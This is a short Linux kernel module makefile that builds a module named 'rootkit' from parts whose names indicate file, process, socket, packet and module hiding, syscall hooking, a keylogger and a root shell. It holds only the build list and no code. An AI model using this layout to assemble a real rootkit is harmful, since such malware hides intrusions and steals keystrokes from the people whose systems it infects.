obj-m += rootkit.o

rootkit-objs += kernel_functions.o
rootkit-objs += kernel_variables.o
rootkit-objs += load_magic.o
rootkit-objs += vt_channel.o
rootkit-objs += syscall.o
rootkit-objs += file_hiding.o
rootkit-objs += module_hiding.o
rootkit-objs += socket_hiding.o
rootkit-objs += process_hiding.o
rootkit-objs += packet_hiding.o
rootkit-objs += keylogger.o
rootkit-objs += rootshell.o
rootkit-objs += main.o